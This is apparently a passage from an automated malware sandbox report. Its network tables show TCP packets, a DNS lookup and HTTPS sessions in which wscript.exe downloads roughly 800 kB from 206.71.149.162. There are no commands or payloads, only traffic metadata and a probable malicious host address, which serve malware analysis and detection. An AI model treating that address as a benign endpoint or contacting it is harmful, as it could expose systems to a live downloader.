| Oct 24, 2023 06:55:28.581404924 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:28.581536055 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:28.882714987 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:28.882755041 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:28.882801056 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:28.882853031 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:28.882872105 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:28.882898092 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:28.882922888 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:28.956168890 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:28.956301928 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:29.087516069 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:29.087608099 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:29.254981041 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:29.255233049 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:29.334963083 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:29.335033894 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:29.335057020 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:29.626379967 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:29.626424074 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:29.626580954 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:29.670293093 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:29.670480967 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:29.797260046 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:29.797435999 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:29.964745045 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:29.964854956 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:30.046130896 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:30.046345949 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:30.434865952 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:30.434891939 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:30.434953928 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:30.435022116 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:30.435040951 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:30.435214043 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:30.549601078 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:30.549705029 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:30.770711899 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:30.770735025 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:30.770800114 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:30.938268900 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:30.938493013 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:31.105611086 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:31.105679989 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:31.105720997 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:31.105740070 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:31.105753899 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:31.105766058 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:31.105779886 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:31.105811119 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:31.297889948 CEST | 49741 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:31.297919035 CEST | 443 | 49741 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:35.274823904 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:35.274918079 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:35.275043964 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:35.275397062 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:35.275429964 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:35.627537012 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:35.627655983 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:35.630409956 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:35.630439043 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:35.630630970 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:35.630642891 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:35.960217953 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:35.960284948 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:35.960395098 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:35.960396051 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:35.960473061 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:35.960530996 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.127269983 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.127373934 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.127873898 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.127960920 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.128226995 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.128307104 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.294701099 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.294828892 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.295037031 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.295128107 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.295666933 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.295741081 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.295989990 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.296065092 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.296631098 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.296706915 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.297336102 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.297410011 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.297590017 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.297660112 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.462723017 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.462855101 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.463165998 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.463243961 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.464227915 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.464411020 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.464716911 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.464802980 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.465017080 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.465084076 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.465894938 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.465965986 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.466402054 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.466465950 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.466805935 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.466882944 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.467588902 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.467662096 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.467854977 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.467921972 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.468390942 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.468453884 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.469067097 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.469136953 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.630108118 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.630203962 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.630486012 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.630561113 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.630809069 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.630877972 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.631098986 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.631165028 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.631711006 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.631778955 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.632137060 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.632195950 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.632220984 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.632467031 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.632533073 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.633157015 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.633233070 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.633383036 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.633447886 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.633671045 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.633749962 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.634421110 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.634526014 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.634706020 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.634773016 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.635135889 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.635195017 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.635703087 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.635761976 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.636044979 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.636111021 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.636533976 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.636599064 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.637101889 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.637168884 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.637486935 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.637548923 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.637667894 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.637731075 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.638206959 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.638281107 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.638668060 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.638726950 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.639111042 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.639178991 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.639406919 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.639477968 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.639863014 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.639924049 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.640119076 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.640173912 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.674145937 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.674406052 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.798399925 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.798640966 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.799048901 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.799137115 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.799685955 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.799819946 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.799945116 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.800040007 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.800673962 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.800770044 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.801038980 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.801134109 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.801675081 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.801762104 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.802218914 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.802306890 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.802573919 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.802660942 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.803107023 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.803195953 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.803472042 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.803561926 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.803853989 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.803920031 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Oct 24, 2023 06:55:36.803941965 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.804006100 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.806144953 CEST | 49743 | 443 | 192.168.2.4 | 206.71.149.162 |
| Oct 24, 2023 06:55:36.806196928 CEST | 443 | 49743 | 206.71.149.162 | 192.168.2.4 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Oct 24, 2023 06:55:17.539669991 CEST | 51975 | 53 | 192.168.2.4 | 1.1.1.1 |
| Oct 24, 2023 06:55:17.642384052 CEST | 53 | 51975 | 1.1.1.1 | 192.168.2.4 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Oct 24, 2023 06:55:17.539669991 CEST | 192.168.2.4 | 1.1.1.1 | 0x12c7 | Standard query (0) | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Oct 24, 2023 06:55:17.642384052 CEST | 1.1.1.1 | 192.168.2.4 | 0x12c7 | No error (0) | 206.71.149.162 | A (IP address) | IN (0x0001) | false |
|
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49737 | 206.71.149.162 | 443 | C:\Windows\SysWOW64\wscript.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2023-10-24 04:55:18 UTC | 0 | OUT | |
| 2023-10-24 04:55:18 UTC | 0 | IN | |
| 2023-10-24 04:55:18 UTC | 0 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 49738 | 206.71.149.162 | 443 | C:\Windows\SysWOW64\wscript.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2023-10-24 04:55:18 UTC | 0 | OUT | |
| 2023-10-24 04:55:19 UTC | 1 | IN | |
| 2023-10-24 04:55:19 UTC | 1 | IN | |
| 2023-10-24 04:55:19 UTC | 9 | IN | |
| 2023-10-24 04:55:19 UTC | 25 | IN | |
| 2023-10-24 04:55:19 UTC | 26 | IN | |
| 2023-10-24 04:55:19 UTC | 26 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 2 | 192.168.2.4 | 49739 | 206.71.149.162 | 443 | C:\Windows\SysWOW64\wscript.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2023-10-24 04:55:20 UTC | 26 | OUT | |
| 2023-10-24 04:55:20 UTC | 27 | IN | |
| 2023-10-24 04:55:20 UTC | 27 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 3 | 192.168.2.4 | 49740 | 206.71.149.162 | 443 | C:\Windows\SysWOW64\wscript.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| 2023-10-24 04:55:20 UTC | 27 | OUT | |
| 2023-10-24 04:55:21 UTC | 27 | IN | |
| 2023-10-24 04:55:21 UTC | 27 | IN | |
| 2023-10-24 04:55:21 UTC | 35 | IN | |
| 2023-10-24 04:55:21 UTC | 43 | IN | |
| 2023-10-24 04:55:21 UTC | 51 | IN | |
| 2023-10-24 04:55:21 UTC | 59 | IN | |
| 2023-10-24 04:55:21 UTC | 67 | IN | |
| 2023-10-24 04:55:21 UTC | 74 | IN | |
| 2023-10-24 04:55:21 UTC | 82 | IN | |
| 2023-10-24 04:55:21 UTC | 90 | IN | |
| 2023-10-24 04:55:21 UTC | 98 | IN | |
| 2023-10-24 04:55:21 UTC | 106 | IN | |
| 2023-10-24 04:55:21 UTC | 113 | IN | |
| 2023-10-24 04:55:21 UTC | 121 | IN | |
| 2023-10-24 04:55:21 UTC | 129 | IN | |
| 2023-10-24 04:55:21 UTC | 137 | IN | |
| 2023-10-24 04:55:21 UTC | 145 | IN | |
| 2023-10-24 04:55:21 UTC | 152 | IN | |
| 2023-10-24 04:55:21 UTC | 160 | IN | |
| 2023-10-24 04:55:21 UTC | 168 | IN | |
| 2023-10-24 04:55:21 UTC | 176 | IN | |
| 2023-10-24 04:55:21 UTC | 184 | IN | |
| 2023-10-24 04:55:21 UTC | 192 | IN | |
| 2023-10-24 04:55:21 UTC | 199 | IN | |
| 2023-10-24 04:55:21 UTC | 207 | IN | |
| 2023-10-24 04:55:21 UTC | 215 | IN | |
| 2023-10-24 04:55:21 UTC | 223 | IN | |
| 2023-10-24 04:55:21 UTC | 231 | IN | |
| 2023-10-24 04:55:21 UTC | 238 | IN | |
| 2023-10-24 04:55:21 UTC | 246 | IN | |
| 2023-10-24 04:55:21 UTC | 254 | IN | |
| 2023-10-24 04:55:21 UTC | 262 | IN | |
| 2023-10-24 04:55:21 UTC | 270 | IN | |
| 2023-10-24 04:55:21 UTC | 277 | IN | |
| 2023-10-24 04:55:21 UTC | 285 | IN | |
| 2023-10-24 04:55:21 UTC | 293 | IN | |
| 2023-10-24 04:55:21 UTC | 301 | IN | |
| 2023-10-24 04:55:21 UTC | 309 | IN | |
| 2023-10-24 04:55:21 UTC | 317 | IN | |
| 2023-10-24 04:55:21 UTC | 324 | IN | |
| 2023-10-24 04:55:21 UTC | 332 | IN | |
| 2023-10-24 04:55:21 UTC | 340 | IN | |
| 2023-10-24 04:55:21 UTC | 348 | IN | |
| 2023-10-24 04:55:21 UTC | 356 | IN | |
| 2023-10-24 04:55:21 UTC | 363 | IN | |
| 2023-10-24 04:55:21 UTC | 371 | IN | |
| 2023-10-24 04:55:21 UTC | 379 | IN | |
| 2023-10-24 04:55:21 UTC | 387 | IN | |
| 2023-10-24 04:55:21 UTC | 395 | IN | |
| 2023-10-24 04:55:21 UTC | 402 | IN | |
| 2023-10-24 04:55:21 UTC | 410 | IN | |
| 2023-10-24 04:55:21 UTC | 418 | IN | |
| 2023-10-24 04:55:21 UTC | 426 | IN | |
| 2023-10-24 04:55:21 UTC | 434 | IN | |
| 2023-10-24 04:55:21 UTC | 442 | IN | |
| 2023-10-24 04:55:21 UTC | 449 | IN | |
| 2023-10-24 04:55:21 UTC | 457 | IN | |
| 2023-10-24 04:55:21 UTC | 465 | IN | |
| 2023-10-24 04:55:21 UTC | 473 | IN | |
| 2023-10-24 04:55:21 UTC | 481 | IN | |
| 2023-10-24 04:55:21 UTC | 488 | IN | |
| 2023-10-24 04:55:21 UTC | 496 | IN | |
| 2023-10-24 04:55:21 UTC | 504 | IN | |
| 2023-10-24 04:55:21 UTC | 512 | IN | |
| 2023-10-24 04:55:21 UTC | 520 | IN | |
| 2023-10-24 04:55:21 UTC | 527 | IN | |
| 2023-10-24 04:55:21 UTC | 535 | IN | |
| 2023-10-24 04:55:21 UTC | 543 | IN | |
| 2023-10-24 04:55:21 UTC | 551 | IN | |
| 2023-10-24 04:55:21 UTC | 559 | IN | |
| 2023-10-24 04:55:21 UTC | 567 | IN | |
| 2023-10-24 04:55:21 UTC | 574 | IN | |
| 2023-10-24 04:55:21 UTC | 582 | IN | |
| 2023-10-24 04:55:21 UTC | 590 | IN | |
| 2023-10-24 04:55:21 UTC | 598 | IN | |
| 2023-10-24 04:55:21 UTC | 606 | IN | |
| 2023-10-24 04:55:21 UTC | 613 | IN | |
| 2023-10-24 04:55:21 UTC | 621 | IN | |
| 2023-10-24 04:55:21 UTC | 629 | IN | |
| 2023-10-24 04:55:21 UTC | 637 | IN | |
| 2023-10-24 04:55:21 UTC | 645 | IN | |
| 2023-10-24 04:55:21 UTC | 652 | IN | |
| 2023-10-24 04:55:21 UTC | 660 | IN | |
| 2023-10-24 04:55:21 UTC | 668 | IN | |
| 2023-10-24 04:55:21 UTC | 676 | IN | |
| 2023-10-24 04:55:21 UTC | 684 | IN | |
| 2023-10-24 04:55:21 UTC | 692 | IN | |
| 2023-10-24 04:55:21 UTC | 699 | IN | |
| 2023-10-24 04:55:21 UTC | 707 | IN | |
| 2023-10-24 04:55:21 UTC | 715 | IN | |
| 2023-10-24 04:55:21 UTC | 723 | IN | |
| 2023-10-24 04:55:21 UTC | 731 | IN | |
| 2023-10-24 04:55:21 UTC | 738 | IN | |
| 2023-10-24 04:55:21 UTC | 746 | IN | |
| 2023-10-24 04:55:21 UTC | 754 | IN | |
| 2023-10-24 04:55:21 UTC | 762 | IN | |
| 2023-10-24 04:55:21 UTC | 770 | IN | |
| 2023-10-24 04:55:21 UTC | 777 | IN | |
| 2023-10-24 04:55:21 UTC | 785 | IN | |
| 2023-10-24 04:55:21 UTC | 793 | IN | |
| 2023-10-24 04:55:22 UTC | 801 | IN | |
| 2023-10-24 04:55:22 UTC | 809 | IN | |
| 2023-10-24 04:55:22 UTC | 817 | IN | |
| 2023-10-24 04:55:22 UTC | 824 | IN | |
